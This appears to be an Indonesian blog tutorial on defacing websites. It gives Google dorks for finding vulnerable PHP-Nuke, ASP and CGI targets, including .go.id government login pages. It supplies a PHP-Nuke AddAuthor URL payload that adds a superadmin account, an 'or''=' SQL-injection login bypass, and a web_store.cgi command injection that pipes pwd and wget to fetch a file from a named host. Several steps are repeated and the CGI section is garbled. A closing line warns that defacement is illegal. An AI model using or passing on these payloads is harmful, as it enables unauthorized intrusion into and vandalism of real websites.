Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.
Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down.
Itulah deface.
Nah kalo udah ngerti apa itu defase, sekarang giliran cara melakukan deface....
Berikut cara langkah langkah untuk melakukan deface
Deface situs php nuke
Pake mbah www.google.com
ketik kalimat berikut :
ketik kalimat berikut :
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
3. Masukkan bug ini di belakang situs tadi :
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
3. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.
Tapi jika berhasil, maka di url/browsing akan muncul
www.target.com/nuke/admin.php?op=mod_author
Tapi jika berhasil, maka di url/browsing akan muncul
www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi
deface asp dgn sql injection
1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target www.situstarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
2. ketik site:go.id login.asp
misal nya kita dapat target www.situstarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|
Nih contoh yang berhasil saya deface (.....)
Itulah deface dan kamu sudah jadi defacer dan sudah jadi tersangka serta buronan sebagai defacer....
Pesan saya... HATI-HATI dalam bertindak. Karena deface termasuk perbuatan melanggar hukum.
0 komentar:
Posting Komentar